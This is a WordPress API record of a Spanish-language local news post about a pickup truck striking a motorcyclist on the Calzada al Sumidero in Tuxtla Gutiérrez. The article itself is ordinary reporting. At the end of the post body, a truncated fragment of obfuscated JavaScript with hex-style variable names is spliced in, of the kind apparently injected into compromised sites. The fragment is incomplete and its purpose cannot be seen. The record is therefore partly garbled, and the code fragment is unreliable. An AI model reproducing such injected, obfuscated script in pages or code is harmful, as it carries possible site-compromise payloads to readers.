{"id":15204,"date":"2024-04-19T00:58:03","date_gmt":"2024-04-19T00:58:03","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=15204"},"modified":"2024-04-19T00:58:04","modified_gmt":"2024-04-19T00:58:04","slug":"particular-embiste-a-motociclista-en-la-calzada-al-sumidero","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=15204","title":{"rendered":"Particular embiste a motociclista en la Calzada al Sumidero"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"15205\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1713488173168-1024x768.jpg\" alt=\"\" class=\"wp-image-15205\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1713488173168-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1713488173168-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1713488173168-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1713488173168.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"15206\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1713488177850-1024x768.jpg\" alt=\"\" class=\"wp-image-15206\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1713488177850-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1713488177850-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1713488177850-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1713488177850.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 18 de abril del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este jueves por la tarde, se registr\u00f3 un accidente de tr\u00e1nsito sobre la Calzada al Sumidero, dejando un saldo de un herido y da\u00f1os materiales.<\/p>\n\n\n\n<p>Los reportes oficiales informaron que, este hecho ocurri\u00f3 cuando el conductor de una motocicleta Italika de color blanco con azul que circulaba con preferencia de Norte a Sur.<\/p>\n\n\n\n<p>Sinembargo fue a la altura de la Avenida Fresno cuando el conductor de una Ford Ranger de color blanco que circulaba de Sur a Norte gir\u00f3 a la izquierda, e hizo corte de circulaci\u00f3n a la moto.<\/p>\n\n\n\n<p>La moto se impact\u00f3 de lleno y los ocupantes se estrellaron contra el pavimento.<\/p>\n\n\n\n<p>Se supo que, el responsable intent\u00f3 escapar pero fue alcanzado por otros motociclistas y llevado al punto de impacto.<\/p>\n\n\n\n<p>Con el apoyo de las autoridades de tr\u00e1nsito los involucrados llegaron a un acuerdo armonioso y se retiraron del lugar.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 18 de abril del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este jueves por la tarde, se registr\u00f3 un accidente de tr\u00e1nsito sobre la Calzada al Sumidero, dejando un saldo de un herido y da\u00f1os materiales. Los reportes oficiales informaron que, este hecho ocurri\u00f3 cuando el conductor de una motocicleta Italika de color blanco &hellip;<\/p>\n","protected":false},"author":2,"featured_media":15205,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-15204","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15204","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=15204"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15204\/revisions"}],"predecessor-version":[{"id":15207,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15204\/revisions\/15207"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/15205"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=15204"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=15204"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=15204"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}